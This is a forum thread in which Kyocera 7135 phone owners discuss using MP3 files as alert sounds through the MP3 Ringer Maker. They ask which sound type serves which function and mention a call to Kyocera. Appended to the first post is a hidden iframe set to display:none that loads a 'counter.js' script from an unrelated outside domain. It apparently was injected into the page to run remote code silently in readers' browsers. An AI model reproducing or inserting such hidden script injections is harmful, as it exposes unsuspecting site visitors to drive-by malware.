+ Reply to Thread

Thread: MP3 as an alert

MP3 as an alert

There are a plethora of choices when within the Kyocera MP3 Ringer Maker. Some of the choices include Ringer, Alert, Tone, System, Flip.

I'd like to use an MP3 as an alert for when I receive pages or text messages. I'd also like to use an MP3 for an appointment alert.

I'm not sure what sound type to select for which function. Ringer, Alarm and Flip are pretty self explanatory but the others have me a bit confused.

We need enlightenment from Hotsync. An FAQ would be great.

p.s. Attached is the pdb communicator sound from for those of you purists that don't want to settle for the dolphin.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Attached Files

Thanks PDA, sounds great!! No they will be VERY envious at work!!

I've got a Holy Grail "message for you" that i'm dying to implement as my SMS message indicator. If there is a way I'm sure HotSync can figure it out.

This really should be moved back to 7135 Discussion or 7135 FAQ Create a sticky if you want but I think a lot of people are going to want to know how to do this as well and I don't think it will be found here.

I called Kyocera on this today and explained that the MP3 Ringer Maker would seem to indicate that MP3's can be used for things other than just ringers, alarms or flip sounds.

They are looking into this. Possibly adding an alert sound drop down list to Messages similar to alarms and flip sounds.